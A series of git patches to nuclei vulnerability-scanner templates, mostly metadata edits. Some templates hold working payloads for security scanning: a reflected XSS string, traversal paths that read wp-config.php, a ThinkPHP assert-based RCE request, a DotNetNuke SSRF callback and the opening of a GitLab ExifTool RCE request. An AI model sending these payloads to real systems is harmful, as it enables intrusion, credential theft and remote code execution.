Tue, 26 Oct 2021 22:49:13 +0530 Subject: [PATCH 087/145] Rename technologies/ibm-http-server.yaml to technologies/ibm/ibm-http-server.yaml --- technologies/{ => ibm}/ibm-http-server.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => ibm}/ibm-http-server.yaml (100%) diff --git a/technologies/ibm-http-server.yaml b/technologies/ibm/ibm-http-server.yaml similarity index 100% rename from technologies/ibm-http-server.yaml rename to technologies/ibm/ibm-http-server.yaml From 639ba3a0681cd6ec77515df348d31b860b2a6bca Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 26 Oct 2021 14:43:24 -0300 Subject: [PATCH 088/145] Update cname-service-detection.yaml Example nuclei -t cname-service-detection.yaml -u https://www.start.onlyfans.com --- dns/cname-service-detection.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/dns/cname-service-detection.yaml b/dns/cname-service-detection.yaml index dea6bbb752..20997548e8 100644 --- a/dns/cname-service-detection.yaml +++ b/dns/cname-service-detection.yaml @@ -28,4 +28,8 @@ dns: - type: word name: announcekit words: - - "cname.announcekit.app" \ No newline at end of file + - "cname.announcekit.app" + - type: word + name: wix + words: + - "wixdns.net" From a52179304518dad49de92754073405508eaa1e36 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:41:20 +0530 Subject: [PATCH 089/145] Update openemr-detect.yaml --- exposed-panels/openemr-detect.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml index 1b43237045..c802240f49 100644 --- a/exposed-panels/openemr-detect.yaml +++ b/exposed-panels/openemr-detect.yaml @@ -1,21 +1,24 @@ id: openemr-detect info: - name: DOpenEMR Product Detect + name: OpenEMR Product Detect author: pussycat0x severity: info metadata: shodan-dork: 'app="OpenEMR"' - tags: panel + tags: panel,openemr + requests: - method: GET path: - "{{BaseURL}}/interface/login/login.php?site=default" + matchers-condition: and matchers: - type: word + part: body words: - '"title":"OpenEMR Product Registration"' - condition: and + - type: status status: - - 200 \ No newline at end of file + - 200 From d43c694da7367711a6a8f8d9871076636b4971de Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:41:28 +0530 Subject: [PATCH 090/145] Delete docker-version-detect.yaml --- misconfiguration/docker-version-detect.yaml | 22 --------------------- 1 file changed, 22 deletions(-) delete mode 100644 misconfiguration/docker-version-detect.yaml diff --git a/misconfiguration/docker-version-detect.yaml b/misconfiguration/docker-version-detect.yaml deleted file mode 100644 index 9709eb0f28..0000000000 --- a/misconfiguration/docker-version-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: docker-version-detect -info: - name: Docker Version Detect - author: pussycat0x - severity: info - metadata: - shodan-dork: 'product:"docker"' - tags: docker,unauth,devops -requests: - - method: GET - path: - - "{{BaseURL}}/version" - matchers-condition: and - matchers: - - type: word - words: - - '"ApiVersion":' - - '"BuildTime":' - condition: and - - type: status - status: - - 200 \ No newline at end of file From 4b3c46a773f38fe6cd936eddd5dc1c7842d1dd37 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:51:04 +0530 Subject: [PATCH 091/145] Update CVE-2016-1000136.yaml --- cves/2016/CVE-2016-1000136.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml index b939c0b525..e03020ec96 100644 --- a/cves/2016/CVE-2016-1000136.yaml +++ b/cves/2016/CVE-2016-1000136.yaml @@ -1,23 +1,25 @@ id: CVE-2016-1000136 info: - name: heat-trackr v1.0 - Reflected Cross-Site Scripting (XSS) via heat-trackr_abtest_add.php + name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php author: daffainfo severity: medium description: Reflected XSS in wordpress plugin heat-trackr v1.0 - reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '"><script>alert(1);</script><"' + - '</script><script>alert(document.domain)</script>' part: body - type: word From 0ff78c8a845fc50f8f66b12ffd7cf692cac5efea Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:52:04 +0530 Subject: [PATCH 092/145] Update sugarcrm-panel.yaml --- exposed-panels/sugarcrm-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml index 2ee96c18fc..6edf2c347c 100644 --- a/exposed-panels/sugarcrm-panel.yaml +++ b/exposed-panels/sugarcrm-panel.yaml @@ -3,8 +3,8 @@ id: sugarcrm-panel info: name: Detect SugarCRM Panel author: johnk3r - reference: https://www.shodan.io/search?query=sugarcrm severity: info + reference: https://www.shodan.io/search?query=sugarcrm tags: sugarcrm,panel requests: From ab633f8675bf686ba32c97f3bf112e12a50f456a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:55:34 +0530 Subject: [PATCH 093/145] Update and rename wp-javospot-premium-theme-lfi.yaml to vulnerabilities/wordpress/wp-javospot-lfi.yaml --- .../wordpress/wp-javospot-lfi.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) rename wp-javospot-premium-theme-lfi.yaml => vulnerabilities/wordpress/wp-javospot-lfi.yaml (51%) diff --git a/wp-javospot-premium-theme-lfi.yaml b/vulnerabilities/wordpress/wp-javospot-lfi.yaml similarity index 51% rename from wp-javospot-premium-theme-lfi.yaml rename to vulnerabilities/wordpress/wp-javospot-lfi.yaml index d616291a71..2cd2daec41 100644 --- a/wp-javospot-premium-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -1,24 +1,27 @@ -id: wp-javospot-premium-theme-lfi +id: wp-javospot-lfi info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko severity: high + reference: + - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ + - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab + - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 tags: wordpress,wp-theme,lfi,wp - reference: https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin-ajax.php? jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - part: body condition: and - type: status From 8178635b45d9644be420c6c558e52e4834e7462a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:58:12 +0530 Subject: [PATCH 094/145] Update CVE-2015-5471.yaml --- cves/2015/CVE-2015-5471.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml index c2d47397d1..050eb00614 100644 --- a/cves/2015/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -3,7 +3,11 @@ info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko severity: high - reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. + reference: + - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + - http://www.vapid.dhs.org/advisory.php?v=134 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: From 2c6367720e6eb8466e7d0f137aac0ec435bc0daa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 18:30:55 +0000 Subject: [PATCH 095/145] Auto Generated CVE annotations [Tue Oct 26 18:30:55 UTC 2021] :robot: --- cves/2016/CVE-2016-1000136.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml index e03020ec96..3adf484b9b 100644 --- a/cves/2016/CVE-2016-1000136.yaml +++ b/cves/2016/CVE-2016-1000136.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000136 + cwe-id: CWE-79 requests: - method: GET From 7ccaf4c07a7f4a495f7427a39d445abe276b50b3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 18:33:18 +0000 Subject: [PATCH 096/145] Auto Generated CVE annotations [Tue Oct 26 18:33:18 UTC 2021] :robot: --- cves/2015/CVE-2015-5471.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml index 050eb00614..37ed1b5e40 100644 --- a/cves/2015/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -2,13 +2,18 @@ id: CVE-2015-5471 info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2015-5471 + cwe-id: CWE-22 requests: - method: GET From b928d9a269d291061959bbe3f273b2a661a0c295 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 27 Oct 2021 00:11:48 +0530 Subject: [PATCH 097/145] Update and rename wp-tinymce-thumbnail-plugin-lfi.yaml to wp-tinymce-lfi.yaml --- ...-thumbnail-plugin-lfi.yaml => wp-tinymce-lfi.yaml} | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) rename vulnerabilities/wordpress/{wp-tinymce-thumbnail-plugin-lfi.yaml => wp-tinymce-lfi.yaml} (56%) diff --git a/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml similarity index 56% rename from vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml rename to vulnerabilities/wordpress/wp-tinymce-lfi.yaml index 33592aa212..3b5ed8a2b9 100644 --- a/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml +++ b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml @@ -1,11 +1,14 @@ -id: wp-tinymce-thumbnail-plugin-lfi +id: wp-tinymce-lfi info: name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wordpress - reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 + description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability. + reference: + - https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 + - http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/ + tags: wordpress,wp-theme,lfi,wordpress,tinymce requests: - method: GET @@ -16,10 +19,10 @@ requests: matchers: - type: word part: body - condition: and words: - "DB_NAME" - "DB_PASSWORD" + condition: and - type: status status: From 659f61ca537ea2d3a65a4a323da330b54235ff78 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 27 Oct 2021 00:17:42 +0530 Subject: [PATCH 098/145] Create thinkphp-501-rce.yaml --- .../thinkphp/thinkphp-501-rce.yaml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 vulnerabilities/thinkphp/thinkphp-501-rce.yaml diff --git a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml new file mode 100644 index 0000000000..a9a21e4fd7 --- /dev/null +++ b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -0,0 +1,27 @@ +id: thinkphp-501-rce + +info: + name: ThinkPHP 5.0.1 RCE + author: lark-lab + severity: critical + tags: thinkphp,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/?s=index/index/index" + body: "s=phpinfo()&_method=__construct&filter=assert" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 From a6c30a86a98a6ba922245c8b18ca357c04ceed38 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 18:48:07 +0000 Subject: [PATCH 099/145] Auto README Update [Tue Oct 26 18:48:07 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c3857fb33d..75ccce2154 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2447 files**. +**177 directories, 2454 files**. </td> </tr> From 8e730ca455e7e8dba4117c5a1e5659acb48c4377 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 27 Oct 2021 00:25:22 +0530 Subject: [PATCH 100/145] Create dwsync-exposure.yaml --- exposures/files/dwsync-exposure.yaml | 31 ++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposures/files/dwsync-exposure.yaml diff --git a/exposures/files/dwsync-exposure.yaml b/exposures/files/dwsync-exposure.yaml new file mode 100644 index 0000000000..feb4ad43dc --- /dev/null +++ b/exposures/files/dwsync-exposure.yaml @@ -0,0 +1,31 @@ +id: dwsync-exposure + +info: + name: Dwsync.xml Exposure + author: KaizenSecurity + severity: info + description: The dwsync.xml file is a file generated by Dreamweaver. Where the file contains information related to what files are in the website directory. + tags: dwsync,exposure,dreamweaver + +requests: + - method: GET + path: + - "{{BaseURL}}/_notes/dwsync.xml" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - application/xml + + - type: word + part: body + words: + - '<dwsync>' + - '</dwsync>' + condition: and From e6d40037c5924d68be1ea589808b3d7e341417c5 Mon Sep 17 00:00:00 2001 From: Chill3d <Chill3d@users.noreply.github.com> Date: Wed, 27 Oct 2021 10:30:43 +0200 Subject: [PATCH 101/145] Typo on rocketchat tag --- cves/2020/CVE-2020-28208.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-28208.yaml b/cves/2020/CVE-2020-28208.yaml index 135292b076..5e34ccde4a 100644 --- a/cves/2020/CVE-2020-28208.yaml +++ b/cves/2020/CVE-2020-28208.yaml @@ -6,7 +6,7 @@ info: severity: medium description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. reference: https://trovent.io/security-advisory-2010-01 - tags: cve,cve2020,rockethchat + tags: cve,cve2020,rocketchat classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 From 6958702edd15ae2cda6115472dfcd5c281d1a008 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 15:17:08 +0530 Subject: [PATCH 102/145] Update wix-takeover.yaml --- takeovers/wix-takeover.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/takeovers/wix-takeover.yaml b/takeovers/wix-takeover.yaml index 2b1a07b3ca..854916610d 100644 --- a/takeovers/wix-takeover.yaml +++ b/takeovers/wix-takeover.yaml @@ -1,10 +1,11 @@ id: wix-takeover info: - name: wix takeover detection - author: harshinsecurity - severity: medium - tags: takeover + author: harshinsecurity,philippedelteil + description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over. + severity: high + tags: takeover,wix + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231 requests: - method: GET @@ -14,8 +15,11 @@ requests: matchers-condition: and matchers: - type: word + condition: or words: - 'Error ConnectYourDomain occurred' + - 'wixErrorPagesApp' + - type: status status: - - 404 + - 404 \ No newline at end of file From e7b0645decb999b84864be38a9467c43f8729891 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 15:27:46 +0530 Subject: [PATCH 103/145] Update cname-service-detection.yaml --- dns/cname-service-detection.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/dns/cname-service-detection.yaml b/dns/cname-service-detection.yaml index 20997548e8..2e16efc356 100644 --- a/dns/cname-service-detection.yaml +++ b/dns/cname-service-detection.yaml @@ -11,7 +11,7 @@ dns: type: CNAME class: inet recursion: true - retries: 5 + retries: 3 matchers-condition: or matchers: @@ -29,7 +29,8 @@ dns: name: announcekit words: - "cname.announcekit.app" - - type: word - name: wix - words: - - "wixdns.net" + + - type: word + name: wix + words: + - "wixdns.net" From 7508bafe6426d9e708e0f2a0d14c93be89205f03 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 15:34:35 +0530 Subject: [PATCH 104/145] Adding binary cache --- .github/workflows/template-validate.yml | 18 ++++++++---------- 1 file changed, 8 insertions(+), 10 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 705f870c7e..33e2653241 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -11,21 +11,19 @@ jobs: with: go-version: 1.17 - #- name: Cache Go - # id: cache-go - # uses: actions/cache@v2 - # with: - # path: /home/runner/go - # key: ${{ runner.os }}-go + - name: Cache Go + id: cache-go + uses: actions/cache@v2 + with: + path: /home/runner/go + key: ${{ runner.os }}-go - name: Installing Nuclei - # if: steps.cache-go.outputs.cache-hit != 'true' + if: steps.cache-go.outputs.cache-hit != 'true' run: | go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest - shell: bash - name: Template Validation run: | nuclei -validate -t . - nuclei -validate -w ./workflows - shell: bash \ No newline at end of file + nuclei -validate -w ./workflows \ No newline at end of file From d5d2ed0a0ecaa34c684389d0ba815907f0228a0f Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 13:52:34 +0300 Subject: [PATCH 105/145] Add description --- vulnerabilities/other/sangfor-edr-rce.yaml | 1 + vulnerabilities/other/twig-php-ssti.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/other/sangfor-edr-rce.yaml b/vulnerabilities/other/sangfor-edr-rce.yaml index 7c5966f8a2..997f107b6f 100644 --- a/vulnerabilities/other/sangfor-edr-rce.yaml +++ b/vulnerabilities/other/sangfor-edr-rce.yaml @@ -4,6 +4,7 @@ info: name: Sangfor EDR 3.2.17R1/3.2.21 RCE author: pikpikcu severity: critical + description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands. reference: https://www.cnblogs.com/0day-li/p/13650452.html tags: rce diff --git a/vulnerabilities/other/twig-php-ssti.yaml b/vulnerabilities/other/twig-php-ssti.yaml index 8b113641a5..74355ae13b 100644 --- a/vulnerabilities/other/twig-php-ssti.yaml +++ b/vulnerabilities/other/twig-php-ssti.yaml @@ -4,6 +4,7 @@ info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high + description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. tags: php,ssti requests: From f1cf6fd9a72d8448b14be47564e93db9f36d438a Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:03:22 +0300 Subject: [PATCH 106/145] Add description --- vulnerabilities/other/WooYun-2015-148227.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/WooYun-2015-148227.yaml b/vulnerabilities/other/WooYun-2015-148227.yaml index f15f8d3432..fba7ec1520 100644 --- a/vulnerabilities/other/WooYun-2015-148227.yaml +++ b/vulnerabilities/other/WooYun-2015-148227.yaml @@ -3,6 +3,7 @@ info: name: Seeyon WooYun LFR author: princechaddha severity: high + description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker. reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html tags: seeyon,wooyun,lfi From 3a02b7c3252d6f99e37aa3edee3d9beb9507727f Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:04:00 +0300 Subject: [PATCH 107/145] Add description --- vulnerabilities/other/turbocrm-xss.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml index 88e7d47165..a44e962186 100644 --- a/vulnerabilities/other/turbocrm-xss.yaml +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -4,6 +4,7 @@ info: name: TurboCRM XSS author: pikpikcu severity: medium + description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application. reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a tags: xss,turbocrm From 14ae8e3f598cddc64d42d8bf1f79f6fc266bc449 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:05:11 +0300 Subject: [PATCH 108/145] Add description --- vulnerabilities/other/php-zerodium-backdoor-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 6d4c304b0f..a257806c57 100644 --- a/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -3,6 +3,7 @@ id: php-zerodium-backdoor-rce info: name: PHP Zerodium Backdoor RCE author: dhiyaneshDk + description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code. reference: https://news-web.php.net/php.internals/113838 severity: critical tags: php,backdoor From 9848f92894f38bfadc942483a579f35787813778 Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:06:15 +0300 Subject: [PATCH 109/145] Add description --- vulnerabilities/other/rconfig-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index 00bc474218..0d32e296d5 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -5,6 +5,7 @@ info: author: dwisiswant0 severity: high tags: rconfig,rce + description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. reference: - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - https://www.exploit-db.com/exploits/48878 From 376c63189d7627145057cb6cac5e40c3baf96def Mon Sep 17 00:00:00 2001 From: Noam Rathaus <noamr@beyondsecurity.com> Date: Wed, 27 Oct 2021 14:07:22 +0300 Subject: [PATCH 110/145] Add description --- cves/2018/CVE-2018-9845.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-9845.yaml b/cves/2018/CVE-2018-9845.yaml index 996b77a31d..9b9b600503 100644 --- a/cves/2018/CVE-2018-9845.yaml +++ b/cves/2018/CVE-2018-9845.yaml @@ -4,6 +4,7 @@ info: name: Etherpad Lite before 1.6.4 is exploitable for admin access. author: philippedelteil severity: critical + description: Etherpad Lite before 1.6.4 is exploitable for admin access. reference: - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b From 70c90bba845ac22c433af123a103561c2f91ba2c Mon Sep 17 00:00:00 2001 From: meme-lord <17912559+meme-lord@users.noreply.github.com> Date: Wed, 27 Oct 2021 12:45:18 +0100 Subject: [PATCH 111/145] Added CVE-2017-0929 (DNN SSRF) --- cves/2017/CVE-2017-0929.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cves/2017/CVE-2017-0929.yaml diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml new file mode 100644 index 0000000000..ea6e1204e4 --- /dev/null +++ b/cves/2017/CVE-2017-0929.yaml @@ -0,0 +1,18 @@ +id: CVE-2017-0929 +info: + name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) + severity: medium + reference: + - https://hackerone.com/reports/482634 + author: CharanRayudu, meme-lord + tags: cve,cve2017,ssrf,dotnetnuke + +requests: + - method: GET + path: + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}' + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 46321e321c86bb36a2137b28f9c4f5d02235dae2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 12:05:42 +0000 Subject: [PATCH 112/145] Auto Generated CVE annotations [Wed Oct 27 12:05:42 UTC 2021] :robot: --- cves/2017/CVE-2017-0929.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-0929.yaml b/cves/2017/CVE-2017-0929.yaml index ea6e1204e4..ebe7ad1e9c 100644 --- a/cves/2017/CVE-2017-0929.yaml +++ b/cves/2017/CVE-2017-0929.yaml @@ -1,11 +1,17 @@ id: CVE-2017-0929 info: name: DotNetNuke ImageHandler SSRF (CVE-2017-0929) - severity: medium + severity: high reference: - https://hackerone.com/reports/482634 author: CharanRayudu, meme-lord tags: cve,cve2017,ssrf,dotnetnuke + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-0929 + cwe-id: CWE-918 + description: "DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources." requests: - method: GET From 6490a968b37c03014d804bb4b6423a06b0f59967 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Wed, 27 Oct 2021 18:01:04 +0530 Subject: [PATCH 113/145] Added GitLab CE/EE Unauthenticated RCE using ExifTool (CVE-2021-22205) --- cves/2021/CVE-2021-22205.yaml | 62 +++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 cves/2021/CVE-2021-22205.yaml diff --git a/cves/2021/CVE-2021-22205.yaml b/cves/2021/CVE-2021-22205.yaml new file mode 100644 index 0000000000..d70718eb42 --- /dev/null +++ b/cves/2021/CVE-2021-22205.yaml @@ -0,0 +1,62 @@ +id: CVE-2021-22205 + +info: + name: GitLab CE/EE Unauthenticated RCE using ExifTool + author: pdteam + severity: critical + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. + reference: + - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ + - https://hackerone.com/reports/1154542 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + tags: cve,cve2021,gitlab,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.90 + cve-id: CVE-2021-22205 + cwe-id: CWE-20 + +requests: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /uploads/user HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 + X-CSRF-Token: {{csrf-token}} + + 